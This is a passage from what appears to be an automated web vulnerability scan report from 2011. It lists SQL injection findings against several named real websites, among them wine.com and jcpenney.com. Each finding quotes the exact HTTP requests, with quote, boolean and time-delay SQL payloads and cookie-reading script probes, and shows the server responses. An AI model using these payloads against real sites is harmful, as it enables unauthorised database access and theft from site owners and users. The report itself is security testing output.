Host:   http://www.virtusa.com
Path:   /applications/userlogin/userlogin.asp

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft Access.

Request

GET /applications'/userlogin/userlogin.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 344
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACTRQTBD=ACNJABCBDCJFGENDKPKPBPHM; path=/
X-Powered-By: ASP.NET
Date: Fri, 18 Mar 2011 19:23:50 GMT
Connection: close

<font face="Arial" size=2>
<p>Microsoft JET Database Engine</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Syntax error in string in query expression 'lcase(oldurl)='/applications'/userlogin/userlogin.asp''.</font>
...[SNIP]...

1.153. http://www.virtusa.com/applications/userlogin/userlogin.asp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.virtusa.com
Path:   /applications/userlogin/userlogin.asp

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft Access.

Request

GET /applications/userlogin'/userlogin.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 344
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACTRQTBD=OKNJABCBAFFICICKLJCHKBNL; path=/
X-Powered-By: ASP.NET
Date: Fri, 18 Mar 2011 19:24:02 GMT
Connection: close

<font face="Arial" size=2>
<p>Microsoft JET Database Engine</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Syntax error in string in query expression 'lcase(oldurl)='/applications/userlogin'/userlogin.asp''.</font>
...[SNIP]...

1.154. http://www.virtusa.com/applications/userlogin/userlogin.asp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.virtusa.com
Path:   /applications/userlogin/userlogin.asp

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft Access.

Request

GET /applications/userlogin/userlogin.asp' HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 344
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACTRQTBD=APNJABCBHONHGHPLABHBPNFC; path=/
X-Powered-By: ASP.NET
Date: Fri, 18 Mar 2011 19:24:14 GMT
Connection: close

<font face="Arial" size=2>
<p>Microsoft JET Database Engine</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Syntax error in string in query expression 'lcase(oldurl)='/applications/userlogin/userlogin.asp'''.</font>
...[SNIP]...

1.155. http://www.wi-fihotspotlist.com/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.wi-fihotspotlist.com
Path:   /

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?4100a--%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.wi-fihotspotlist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d1--%20
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:36:52 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Mar 2011 16:37:52 GMT
Connection: close
Content-Type: text/html
Content-Length: 62525

<html>
<head>
<title> Wi-FiHotSpotList.com, a directory of public hot spots for finding Wi-Fi
wireless Internet access network nodes</title>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661891/661881/661869/582072/581034;s=9555;x=7936;f=110921999;u=j;z=20110318123652" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661891/661881/661869/582072/581034;s=9555;x=7936;f=110921999;u=j;z=20110318123652" alt="Click here"></a>
</noscript>
</span>



<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes/toolbars/globaltoolbar/img/background_dn.gif'); background-repeat:repeat-x; line-height:15px; color:#fff} #menulist_cust li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes/toolbars/globaltoolbar/img/background_login.gif'); background-repeat:repeat-x; line-height:15px; color:#fff} .menulist ul li{ float:none; margin:0; margin-bottom:-1px; margin-top:-2px; color:#fff; filter:alpha(opacity=95); -moz-opacity:.05; opacity:.95; color:#fff} .menulist ul>li:last-child{ margin-bottom:1px} .menulist ul li a:hover{ float:none; margin:0; background-color:#666; color:#fff} .menulist ul>li:last-child{ margin-bottom:1px; color:#fff} .menulist a{ display:block; padding:3px; color:#fff; text-decoration:none; text-align:left} .menulist a:hover, .me
...[SNIP]...

Request 2

GET /?4100a--%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.wi-fihotspotlist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d2--%20
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:36:52 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Mar 2011 16:37:52 GMT
Connection: close
Content-Type: text/html
Content-Length: 62515

<html>
<head>
<title> Wi-FiHotSpotList.com, a directory of public hot spots for finding Wi-Fi
wireless Internet access network nodes</title>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661891/661881/661869/582072/581034;s=9555;x=7936;f=678339395;u=j;z=20110318123652" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661891/661881/661869/582072/581034;s=9555;x=7936;f=678339395;u=j;z=20110318123652" alt="Click here"></a>
</noscript>
</span>



<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes/toolbars/globaltoolbar/img/background_dn.gif'); background-repeat:repeat-x; line-height:15px; color:#fff} #menulist_cust li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes/toolbars/globaltoolbar/img/background_login.gif'); background-repeat:repeat-x; line-height:15px; color:#fff} .menulist ul li{ float:none; margin:0; margin-bottom:-1px; margin-top:-2px; color:#fff; filter:alpha(opacity=95); -moz-opacity:.05; opacity:.95; color:#fff} .menulist ul>li:last-child{ margin-bottom:1px} .menulist ul li a:hover{ float:none; margin:0; background-color:#666; color:#fff} .menulist ul>li:last-child{ margin-bottom:1px; color:#fff} .menulist a{ display:block; padding:3px; color:#fff; text-decoration:none; text-align:left} .menulist a:hover, .me
...[SNIP]...

1.156. http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3ef6545857e09 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3ef6545857e09

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 20472 milliseconds to respond to the request, compared with 257 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /v6'waitfor%20delay'0%3a0%3a20'--/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3ef6545857e09 HTTP/1.1
Host: www.wine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: ASPSESSIONIDAQSDRCTT=MFCEKNJBMKNEGDIOGCOECNLG; path=/
Set-Cookie: SL_Audience=822|Unaccelerated|209|1|0;Expires=Sun, 17-Mar-13 16:38:04 GMT;Path=/;Domain=.wine.com
Set-Cookie: __utmv=32446520.SL_TS_Unaccelerated;Expires=Sun, 17-Mar-13 16:38:04 GMT;Path=/;Domain=.wine.com
Cache-Control: private
Date: Fri, 18 Mar 2011 16:38:04 GMT
Connection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 1494


<html>
<head><script id="slheadjs" type="text/javascript" err="true">__$1D0C = { head: new Date()}</script>
   <title>Wine.com - Buy Wine, Wine Clubs, Gift Baskets and more</title>
   <meta name="ke
...[SNIP]...

1.157. http://www.wreg.com/tivid.html [playerID parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.wreg.com
Path:   /tivid.html

Issue detail

The playerID parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the playerID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /tivid.html?itemId=&categoryId=299fda98-b8af-49c4-987a-09d58e40d6e650c4c%22;alert(document.cookie)//2b82136d3bf&playerID=88490040'%20and%201%3d1--%20&playerSize=large&layoutColumns=1&listType=horz&autoPlay=false HTTP/1.1
Host: www.wreg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8l mod_onsint/1.0
x-Instance-Name: i1s28z2n1
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Fri, 18 Mar 2011 16:37:39 GMT
Content-Length: 9247
Connection: close


<html>
<head>


</head>
<body style="margin:0px;">
<script src="/hive/javascripts/video-tool.js" type="text/javascript"></script>
   <script src="/hive/javascripts/AC_OETag
...[SNIP]...
=false";
           var layoutColumns = "&layoutColumns=1";
           var carouselType = "&carouselType=horz";
var titleAvailable = "&titleAvailable=true";
var autoPlay = "&autoPlayVideo=false";

           // -----------------------------------------------------------------------------
           // -->

               // write flash obj with query string
               function writeFlash() {

                   // assemble flash obj
                   var flashTags = '<noscript><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" id="'+playerName+'" align="middle" width="'+width+'" height="100%">';
                   flashTags = ''+flashTags+'<param name="allowScriptAccess" value="sameDomain" />';
                   flashTags = ''+flashTags+'<param name="allowFullScreen" value="true" />';
                   flashTags = ''+flashTags+'<param name="movie" value="'+playerName+'.swf" />';
                   flashTags = ''+flashTags+'<param name="quality" value="high" />';
                   flashTags = ''+flashTags+'<param name="salign" value="l" />';
                flashTags = ''+flashTags+'<param name="wmode" value="opaque" />';
                   flashTags = ''+flashTags+'<param name="bgcolor" value="#ffffff" />';
                   flashTags = ''+flashTags+'<param name="FlashVars" value="'+autoPlay+''+titleAvailable+'&omnitureServer='+omnitureServer+'&omAccount='+omnitureAccount+''+layoutColumns+''+carouselType+''+playerAvailable+''+searchAvailable+''+singleURL+''+multipleURL+'&'+adZone+'&'+adServ+'&'+randNum+'&'+propName+'&'+hostURL+'&swfPath='+swfPath+'" />';
                   flashTags = ''+flashTags+'<embed src="'+swfPath+''+playerName+'" width="'+width+'" wmode="transparent" allowScriptAccess="sameDomain" height="'+height+'" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" salign="l" bgcolor="#ffffff"></embed>';
                   flashTags = ''+flashTags+'</object></noscript>';

                   // write all lines
                   document.write(flashTags);


               }

               function loadVideoInfo(title, duration, published){
                var rePublish = published;
                rePublish = convertXmlTime(published);
                    document.getElementById('video-info').innerHTML = '<div id="video-title"><h1>' +title+
...[SNIP]...

Request 2

GET /tivid.html?itemId=&categoryId=299fda98-b8af-49c4-987a-09d58e40d6e650c4c%22;alert(document.cookie)//2b82136d3bf&playerID=88490040'%20and%201%3d2--%20&playerSize=large&layoutColumns=1&listType=horz&autoPlay=false HTTP/1.1
Host: www.wreg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8l mod_onsint/1.0
x-Instance-Name: i1s30z1n1
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Fri, 18 Mar 2011 16:37:39 GMT
Content-Length: 9269
Connection: close


<html>
<head>


</head>
<body style="margin:0px;">
<script src="/hive/javascripts/video-tool.js" type="text/javascript"></script>
   <script src="/hive/javascripts/AC_OETag
...[SNIP]...
=false";
           var layoutColumns = "&layoutColumns=1";
           var carouselType = "&carouselType=horz";
var titleAvailable = "&titleAvailable=true";
var autoPlay = "&autoPlayVideo=false80580964511441f749c896ba";

           // -----------------------------------------------------------------------------
           // -->

               // write flash obj with query string
               function writeFlash() {

                   // assemble flash obj
                   var flashTags = '<noscript><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" id="'+playerName+'" align="middle" width="'+width+'" height="100%">';
                   flashTags = ''+flashTags+'<param name="allowScriptAccess" value="sameDomain" />';
                   flashTags = ''+flashTags+'<param name="allowFullScreen" value="true" />';
                   flashTags = ''+flashTags+'<param name="movie" value="'+playerName+'.swf" />';
                   flashTags = ''+flashTags+'<param name="quality" value="high" />';
                   flashTags = ''+flashTags+'<param name="salign" value="l" />';
                flashTags = ''+flashTags+'<param name="wmode" value="opaque" />';
                   flashTags = ''+flashTags+'<param name="bgcolor" value="#ffffff" />';
                   flashTags = ''+flashTags+'<param name="FlashVars" value="'+autoPlay+''+titleAvailable+'&omnitureServer='+omnitureServer+'&omAccount='+omnitureAccount+''+layoutColumns+''+carouselType+''+playerAvailable+''+searchAvailable+''+singleURL+''+multipleURL+'&'+adZone+'&'+adServ+'&'+randNum+'&'+propName+'&'+hostURL+'&swfPath='+swfPath+'" />';
                   flashTags = ''+flashTags+'<embed src="'+swfPath+''+playerName+'" width="'+width+'" wmode="transparent" allowScriptAccess="sameDomain" height="'+height+'" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" salign="l" bgcolor="#ffffff"></embed>';
                   flashTags = ''+flashTags+'</object></noscript>';

                   // write all lines
                   document.write(flashTags);


               }

               function loadVideoInfo(title, duration, published){
                var rePublish = published;
                rePublish = convertXmlTime(published);
                    document.getElementById('video-info').innerHTML = '<div id="vi
...[SNIP]...

1.158. http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15' [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.wwmt.com
Path:   /articles/calls-1387029-mubarak-friend.html97f15'

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /articles/calls-1387029-mubarak-friend.html97f15';alert(document.cookie HTTP/1.1
Host: www.wwmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d1--%20
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:40:37 GMT
Server: Apache
Cache-Control: no-store, no-cache, max-age=600
Pragma: no-cache
Expires: Fri, 18 Mar 2011 16:50:37 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 88473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:pas="
...[SNIP]...
<div id="pluck_comments_69754" class="pluck-app pluck-comm" style="display:none;" onpage="1" itemsperpage="10" sort="TimeStampAscending" filter="" commentOnKey="Articlewwmt1387029" commentOnKeyType="article" pagerefresh="false" listtype="full">
   
<div id="pluck_user_miniPersona_dialog_88367" class="pluck-user-mp-dialog" >
   <div class="pluck-user-mp-qtip-style" style="display:none;"></div>
   <div class="pluck-user-mp-wrap">
       <div class="pluck-user-mp-sidebar">
           <div class="pluck-user-mp-avatar-seethrough">
               <a href="#"><img alt="" class="pluck-user-mp-avatarimg" /></a>
           </div>

       </div>
       <div class="pluck-user-mp-wait">
           <div class="pluck-user-mp-wait-modal">&nbsp;</div>
           <div class="pluck-user-mp-wait-msg"><img src="http://sitelife.wwmt.com/ver1.0/Content/ua/images/throbber.gif"/><br/>Please wait while we process your request</div>
       </div>
       <div class="pluck-user-mp-loading">
           <div class="pluck-user-mp-loading-modal">&nbsp;</div>
           <div class="pluck-user-mp-loading-msg"><img src="http://sitelife.wwmt.com/ver1.0/Content/ua/images/throbber.gif"/><br/>Please wait while we retrieve the user's information</div>
       </div>
       <div class="pluck-user-mp-content">
           <h4 class="pluck-user-mp-username"><a href="#"><span class="pluck-user-mp-username-value"></span></a></h4>
           <p class="pluck-user-mp-asl"></p>
           <div class="pluck-user-mp-activity-area">
               <p class="pluck-user-mp-info"><span class="pluck-user-mp-sub-head">Bio</span><span class="pluck-user-mp-text pluck-user-mp-bio"></span></p>
               <p class="pluck-user-mp-info"><span class="pluck-user-mp-no-bio">Your bio is currently empty. Now is a great time to <a href="#">fill in your profile</a>.</span></p>

               <p class="pluck-user-mp-private-info">This profile is private.</p>

               <p class="pluck-user-mp-sharedWithFriends-info">This profile is only shared with friends.</p>

               <p class="pluck-user-mp-abusive-info">This profile is under review.</p>
               <p class="pluck-error-message pluck-user-mp-err
...[SNIP]...

Request 2

GET /articles/calls-1387029-mubarak-friend.html97f15';alert(document.cookie HTTP/1.1
Host: www.wwmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d2--%20
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:40:40 GMT
Server: Apache
Cache-Control: no-store, no-cache, max-age=600
Pragma: no-cache
Expires: Fri, 18 Mar 2011 16:50:40 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 88462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:pas="
...[SNIP]...
<div id="pluck_comments_95408" class="pluck-app pluck-comm" style="display:none;" onpage="1" itemsperpage="10" sort="TimeStampAscending" filter="" commentOnKey="Articlewwmt1387029" commentOnKeyType="article" pagerefresh="false" listtype="full">
   
<div id="pluck_user_miniPersona_dialog_42771" class="pluck-user-mp-dialog" >
   <div class="pluck-user-mp-qtip-style" style="display:none;"></div>
   <div class="pluck-user-mp-wrap">
       <div class="pluck-user-mp-sidebar">
           <div class="pluck-user-mp-avatar-seethrough">
               <a href="#"><img alt="" class="pluck-user-mp-avatarimg" /></a>
           </div>

       </div>
       <div class="pluck-user-mp-wait">
           <div class="pluck-user-mp-wait-modal">&nbsp;</div>
           <div class="pluck-user-mp-wait-msg"><img src="http://sitelife.wwmt.com/ver1.0/Content/ua/images/throbber.gif"/><br/>Please wait while we process your request</div>
       </div>
       <div class="pluck-user-mp-loading">
           <div class="pluck-user-mp-loading-modal">&nbsp;</div>
           <div class="pluck-user-mp-loading-msg"><img src="http://sitelife.wwmt.com/ver1.0/Content/ua/images/throbber.gif"/><br/>Please wait while we retrieve the user's information</div>
       </div>
       <div class="pluck-user-mp-content">
           <h4 class="pluck-user-mp-username"><a href="#"><span class="pluck-user-mp-username-value"></span></a></h4>
           <p class="pluck-user-mp-asl"></p>
           <div class="pluck-user-mp-activity-area">
               <p class="pluck-user-mp-info"><span class="pluck-user-mp-sub-head">Bio</span><span class="pluck-user-mp-text pluck-user-mp-bio"></span></p>
               <p class="pluck-user-mp-info"><span class="pluck-user-mp-no-bio">Your bio is currently empty. Now is a great time to <a href="#">fill in your profile</a>.</span></p>

               <p class="pluck-user-mp-private-info">This profile is private.</p>

               <p class="pluck-user-mp-sharedWithFriends-info">This profile is only shared with friends.</p>

               <p class="pluck-user-mp-abusive-info">This profile is under review.</p>
               <p class="pluck-error-message pluck-user-mp-err
...[SNIP]...

1.159. http://www4.jcpenney.com/jcp/XGN.aspx [pcat parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www4.jcpenney.com
Path:   /jcp/XGN.aspx

Issue detail

The pcat parameter appears to be vulnerable to SQL injection attacks. The payloads 39333395'%20or%201%3d1--%20 and 39333395'%20or%201%3d2--%20 were each submitted in the pcat parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /jcp/XGN.aspx?n=4294953363&catsel=4294953363--comforters+++bedspreads&deptid=70750&pcatid=70750&catid=72384&cattyp=SAL&dep=BEDDING&pcat=BEDDING39333395'%20or%201%3d1--%20&cat=Sale&refpagename=Default%252Easpx&refdeptid=&refcatid=&cmAMS_T=T1&cmAMS_C=C3&CmCatId=homepage&l=1 HTTP/1.1
Host: www4.jcpenney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC"
Content-Type: text/html; charset=utf-8
ntCoent-Length: 332674
Cache-Control: private, max-age=1200
Expires: Fri, 18 Mar 2011 17:10:44 GMT
Date: Fri, 18 Mar 2011 16:50:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: stop_mobi=yes; path=/; domain=jcpenney.com
Content-Length: 332674


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   JCPenney : bedding : sale
</title><link type="text/css" rel
...[SNIP]...
cat=Sale&CatSel=4294953363%7ccomforters+%2b+bedspreads&NOffset=0&Ne=4294957900+5+877+1014+1031+1007+6+8+904+18+833&N=4294953363&pcatid=70750&SO=0&cattyp=SAL&Nao=0&PSO=0&CmCatId=homepage|72384&mscssid=603af9d85d5c9438286514f9fa553cc17xMnVNoVza3oxMnVNoVza3W200BF8B68695FBB36F2F1793306BC2D0F9FA1107716';
var BBTopDim='categories';
var BBTopVal='comforters + bedspreads';
var BBComboDim='categories';
var BBComboVal='comforters + bedspreads';
var BBCurrDim='categories';
var BBCurrVal='comforters + bedspreads';
var Scene7Server='http://render.jcpenney.com:9910/';
var ZoomServer='http://zoom.jcpenney.com/';
</SCRIPT>

<script language="JavaScript" >
       document.domain = 'jcpenney.com';
</script>
<link type="text/css" rel="stylesheet" href="http://answers.jcpenney.com/answers/1573/static/bazaarvoiceQA.css" />
<script language="JavaScript" type="text/javascript" src="http://answers.jcpenney.com/answers/1573/static/bazaarvoiceQA.js"></script>


<script language="JavaScript" src="Javascript/XGN.js?Version=11172010"></script>
<script language="JavaScript" src='Javascript/XBase.js?Version=11172010'></script>

<script language="javascript" type="text/javascript">
var XGN_QV_BUTTON_OFFSET = { left: 45, top: 151 };

function BVcheckLoadState()
{
}


function displayXGNQVButton(element, url)
{
if (XGNbrowser.MACOS && !XGNbrowser.MozBrowser){return;}

_qvButton = document.getElementById("QVButton");

if (_qvButton != null)
{
_qvButton.style.left = findXGNLeft(element) + element.width - _qvButton.width - XGN_QV_BUTTON_OFFSET.left + "px";
_qvButton.style.top = findXGNTop(element) + XGN_QV_BUTTON_OFFSET.top + "px";    
_qvButton.style.visibility = "visible";
_qvButton.onclick= function() {retrieveAndDisplayData("'" + url + "'");};
}
}

function hideXGNQVButton(e)
{
//not supporting Quickview for the MAC IE
if (XGNbrowser.MACOS && !XGNbrowser.MozBrowser){return;}

e = (e) ? e : ((window.event) ? window.event : null);
var toElement = null;

if (e != null)
{
toElement = e.relatedTarget || e.toElement;
}

if (_qvButton != null && _qvButton != toElement)
{
_qvButton.style.visibility = "hidden";
_qvButton = null;
}
}

function d
...[SNIP]...

Request 2

GET /jcp/XGN.aspx?n=4294953363&catsel=4294953363--comforters+++bedspreads&deptid=70750&pcatid=70750&catid=72384&cattyp=SAL&dep=BEDDING&pcat=BEDDING39333395'%20or%201%3d2--%20&cat=Sale&refpagename=Default%252Easpx&refdeptid=&refcatid=&cmAMS_T=T1&cmAMS_C=C3&CmCatId=homepage&l=1 HTTP/1.1
Host: www4.jcpenney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC"
Content-Type: text/html; charset=utf-8
ntCoent-Length: 331838
Cache-Control: private, max-age=1200
Expires: Fri, 18 Mar 2011 17:10:45 GMT
Date: Fri, 18 Mar 2011 16:50:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: stop_mobi=yes; path=/; domain=jcpenney.com
Content-Length: 331838


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   JCPenney : bedding : sale
</title><link type="text/css" rel
...[SNIP]...
cat=Sale&CatSel=4294953363%7ccomforters+%2b+bedspreads&NOffset=0&Ne=4294957900+5+877+1014+1031+1007+6+8+904+18+833&N=4294953363&pcatid=70750&SO=0&cattyp=SAL&Nao=0&PSO=0&CmCatId=homepage|72384&mscssid=6f4bba04b6eb248d3bdd2b74cbd3b976dxMnVNoVza3oxMnVNoVza3W200B90EF05077B21973E31A2B7A80FFC8FFB1107716';
var BBTopDim='categories';
var BBTopVal='comforters + bedspreads';
var BBComboDim='categories';
var BBComboVal='comforters + bedspreads';
var BBCurrDim='categories';
var BBCurrVal='comforters + bedspreads';
var Scene7Server='http://render.jcpenney.com:9910/';
var ZoomServer='http://zoom.jcpenney.com/';
</SCRIPT>

<script language="JavaScript" >
       document.domain = 'jcpenney.com';
</script>
<link type="text/css" rel="stylesheet" href="http://answers.jcpenney.com/answers/1573/static/bazaarvoiceQA.css" />
